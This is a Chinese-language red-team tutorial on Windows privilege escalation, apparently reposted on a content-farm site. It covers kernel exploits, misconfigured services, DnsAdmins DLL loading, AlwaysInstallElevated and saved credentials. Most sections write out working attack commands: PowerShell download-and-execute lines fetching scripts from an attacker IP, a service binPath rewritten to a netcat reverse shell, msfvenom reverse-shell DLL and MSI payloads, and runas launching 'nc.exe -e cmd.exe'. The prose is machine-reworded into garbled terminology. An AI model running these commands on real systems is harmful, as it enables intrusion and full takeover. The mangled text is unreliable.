红队测试之Windows提权小结

本节首要针对Windows把持系统下的权限提拔进行介绍,提权是后渗透主要的一环节,在权限较低的情形下,站在冲击者的视角进行内部收集平安测试、系统平安测试、应用平安测试等方面会显现“束缚”,所测试出的质量与究竟也会分歧。本文基于Win把持系统下离别从内核破绽、权限设置、DLL注入、..表等方面睁开介绍,个中包含破绽自己的介绍、破绽复现过程等内容的显现。该提权内容的阅读没有前后顺序,可凭据读者自身所需进行全文阅读或某偏向内容的阅读。 [原创文章:www.ii77.com]

提权配景

权限提拔意味着用户获得不许可他使用的权限。好比从一个通俗用户,经由“手段”让本身变为治理员用户,也能够懂得为行使把持系统或软件应用法式中的错误,设计缺陷或设置错误来获得对更高接见权限的行为。 [本文来自:www.ii77.com]

为什么我们需要提权

读取/写入敏感文件

从新启动之后权限维持

插入永远后门

Windows提权的常见方式

1.内核破绽

2.错误的办事权限设置

3.DLL注入

4.始终以高权限安装法式

5.凭证存储

内核破绽

破绽介绍

内核破绽行使法式是行使内核破绽来执行具有更高权限的随意代码的法式。成功的内核行使平日会以root号令提醒符的形式为冲击者供应对方针系统的超等用户接见权限。

破绽复现

接下来我们以MS16-032来做演示,

给人人介绍下搜检Windows提权辅助对象,wesng首要匡助检测Windows平安缺陷,是Windows Exploit Suggesters的升级版,经由读取加载systeminfo号令的究竟来输露马脚行使建议。

https://github.com/bitsadmin/wesng.git

1. 将wesng下载到内陆主机上,先升级最新的破绽数据库。

python wes.pyupdate

2. 将方针机械的systeminfo号令的究竟输出并留存,使用wesng进行搜检。

发现只安装3个补丁,能够查察输出究竟来找对应的破绽行使代码。

3.下载https://www.exploit-db.com/exploits/39719里面的破绽行使

使用powershell下载破绽行使代码并执行

Powershell IEX (New-Object Net.WebClient).DownloadString('http://X.X.X.X:8000/ms16-032.ps1');Invoke-MS16-032

错误的办事权限设置

破绽介绍

Microsoft Windows 办事(即以前的 NT 办事)可以建立可长时间运行的可执行应用法式。这些办事能够在较量机启动时主动启动,能够暂停和从新启动并且不显露任何用户界面。这种办事非常适合在办事器上使用,或任何时候,为了不影响在统一台较量机上工作的其他用户,需要长时间运行功能时使用。还能够在分歧登录用户的特定用户帐户或默认较量机帐户的平安上下文中运行办事。Windows办事(Windows Services)平日使用内陆系统账户启动。若是我们拥有能够点窜办事设置权限的话,能够将办事启动的二进制文件替代成恶意的二进制文件,从新启动办事后执行恶意的二进制文件,能够获取到system权限。

破绽复现

1.首先需要在找到存在设置权限错误的办事,这里介绍人人使用powerup.ps1,

https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

powerup是一个非常好用的windows提权辅助剧本,能够搜检各类办事滥用,dll劫持,启动项等,来列举系统上常见的提权体式。

接下来我们以CVE-2019-1322进行演示,Update Orchestrator办事的运行体式为NT AUTHORITY\SYSTEM,而且在Windows 10和Windows Server 2019上已默认启用。首先使用powershell加载powerup.ps1,需要在powerup.ps1结尾中到场InvokeAllchecks或许使用powershell执行时加载,执行如下代码:

Powershell -exec bypass IEX(new-object Net.webclient).downloadstring('http://192.168.25.31:8000/PowerUp.ps1'); InvokeAllchecks

发现USOSVC能够被点窜和重启。

2.接下来我们上传nc,此处能够换成cs或msf生成的随意可执行文件 ,此处有一个小坑,binPath=和路径中央有一个空格,点窜办事启动的可执行法式后,启动办事。

1)住手USOSVC 办事

PS C:\Windows\system32> sc stop UsoSvc

2)将办事执行的exe文件点窜为nc,反弹shell

PS C:\Windows\system32> sc config usosvc binPath= "C:\GitStack\gitphp\nc.exe 192.168.25.31 4455 -e cmd.exe"

3)将办事状况设置为主动启动

PS C:\Windows\system32> sc config usosvc start=auto

4)启动办事

PS C:\Windows\system32> sc start usosvc

安分守纪的执行

执行后,设置并开启办事

DLL注入提权

破绽介绍

DLL注入提权是一种行使应用法式错误加载DLL的手艺。能够使用此手艺来实现提权以及持久掌握。

首先,让我们认识应用法式加载DLL的机制。

DLL代表动态链接库,它是一个库文件,个中包含可被多个应用法式同时动态接见和使用的代码和数据。DLL是Microsoft引入的,用于实现共享库的概念。

破绽复现

若是一个用户是DNSAdmins构成员,能够以治理员权限加载DLL,我们能够经由msfvenom来生成一个反弹shell的DLL文件获取治理员权限。

1. 首先查察我们的用户权限,我们的用户在DNSAdmin组里面

2. 使用msfvenom生成一个反弹shell。

Msfvenom -p windows/x64/shell_reverse_tcp LHOST=X.X.X.X LPORT=443 -f dll -o rev.dll

3. 在冲击者机械启动smb办事,经由UNC来读取冲击机上生成的DLL文件。

4. 在方针机械上挪用dnscmd来执行加载长途DLL文件,通俗用户执行dnscms或者会失败。

PS C:\Users\> dnscmd.exe /config /serverlevelplugindll \\X.X.X.X\s\rev.dllRegistry property serverlevelplugindll successfully reset.Command completed successfully.PS C:\Users\> sc.exe \\resolute stop dnsSERVICE_NAME: dns        TYPE               : 10  WIN32_OWN_PROCESS        STATE              : 3  STOP_PENDING                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)        WIN32_EXIT_CODE    : 0  (0x0)        SERVICE_EXIT_CODE  : 0  (0x0)        CHECKPOINT         : 0x1        WAIT_HINT          : 0x7530*  PS C:\Users\> sc.exe \\resolute start dnsSERVICE_NAME: dns        TYPE               : 10  WIN32_OWN_PROCESS        STATE              : 2  START_PENDING                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)        WIN32_EXIT_CODE    : 0  (0x0)        SERVICE_EXIT_CODE  : 0  (0x0)        CHECKPOINT         : 0x0        WAIT_HINT          : 0x7d0        PID                : 2644        FLAGS              :

5. 获取到system权限的shell

..表键提权

破绽介绍

AlwaysInstallElevated是一项功能,可为Windows较量机上的所有效户(尤其是低特权用户)供应运行任何具有高权限的MSI文件的功能。MSI是基于Microsoft的安装法式软件包文件花样,用于安装,存储和删除法式。

经由组策略中的windows installer来进行设置,默认情形下该设置是封闭的。

破绽复现

1. 首先需要搜检较量机是否开启了该设置,也能够经由执行powerup.ps1来搜检权限。

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

2. 使用msfvenom生成一个msi文件用来反弹shell。

Msfvenom -p windows/meterpreter/reverse_tcp lhost=X.X.X.X lport=4567 -f msi > 1.msi

3. 安装msi,获取反弹shell。

msiexec /quiet /qn /i C:\Windows\Temp\1.msi

凭证存储

破绽介绍

Windows7之后的把持系统供应了windows保险柜功能(Windows Vault),Window保险柜存储Windows能够主动登录用户的凭证,这意味着需要凭证才能接见资源(办事器或网站)的任何Windows应用法式都能够使用此凭证治理器和Windows Vault并使用供应的凭证取代用户一向输入用户名和暗码。

除非应用法式与凭证治理器进行交互,不然我认为它们弗成能对给定资源使用凭证。是以,若是您的应用法式要使用保司库,则应以某种体式与凭证治理器进行通信,并从默认存储保司库中恳求该资源的凭证

破绽复现

1.经由cmdkey /list 列出存储的所有效户的凭证,发现administrator凭证被存储在了本机上。

2.使用runas来以治理员权限启动nc反弹shell

Runas /user:administrator /savecred "nc.exe -e cmd.exe X.X.X.X 1337"

3.在冲击机启动监听,获取反弹shell。

手艺小结

在测试项目中,测试人员平日会设法获取shell,然后再进行下一步的把持,本文旨在给人人供应一些从通俗权限到system权限的思路,根基总结如下:

1.**经由查察内核版本,寻找是否存在能够行使的提权EXP**。

2.经由信息收集,查察机械设置,账户暗码等查察是否能够行使。

3.**经由查察系统的应用,或许第三方应用,查找办事自己是否存在问题,或许是否设置存在问题,如人人常见的mysql**提权

出色介绍







标签:小结 测试 Windows
自媒体 微信号:ii77 扫描二维码关注公众号
爱八卦,爱爆料。

小编推荐

  1. 1 流水是什么意思(流水步距是什么意思)

    大家好,小美今天来为大家解答流水是什么意思以下问题,流水步距是什么意思很多人还不知道,现在让我们一起来看看吧!1、流水的意思有:流动

  2. 2 天祥电子网站视频教程(天祥电子有限公司)

    大家好,小乐今天来为大家解答天祥电子网站视频教程以下问题,天祥电子有限公司很多人还不知道,现在让我们一起来看看吧!1、你好,郭天祥AR

  3. 3 每日识药,祝您早安 | “祛风止痛”白芷

    白芷为伞形科植物兴安白芷、川白芷、杭白芷或云南牛防风的根。秋播莳植的,次年7~9月间茎叶枯黄时采挖。春播莳植的,昔时10月采挖。择好天,

  4. 4 湖南首条“四改八”高速公路即将全面开工!

    春暖花开好新闻传来G4京港澳高速耒宜改扩建项目全线施工许可获批将于近期下达开工令全线实质性开工终于要来了记者从湖南省交通运输厅、湖南省

  5. 5 白袜子女生(白袜子女生)

    大家好,小美今天来为大家解答白袜子女生以下问题,白袜子女生很多人还不知道,现在让我们一起来看看吧!1、有些女孩更倾向于选择纯白的袜子

  6. 6 朝鲜宣布:正式解散

    据朝中社3月24日报道,朝鲜故国统一民主主义战线中央委员会23日正式闭幕。此前报道本地时间1月15日,朝鲜第十四届最高人民会议第十次会议召开,

  7. 7 抢赢生意新蓝海,视频号四大玩法助攻食饮行业新增长

    2024年,消费市场竞争加剧,挑战与机会并存,食饮行业默默迈入加快增进的新时期。与此同时,互联网大盘流量盈余见顶,进入存量阶段,传统营销

  8. 8 微店微信登陆(微店登录)

    大家好,小娟今天来为大家解答微店微信登陆以下问题,微店登录很多人还不知道,现在让我们一起来看看吧!1、用手机打开微店客户端,并登陆微

本文内容来自网友供稿,如有信息侵犯了您的权益,请联系反馈核实

Copyright 2024.爱妻自媒体,让大家了解更多图文资讯!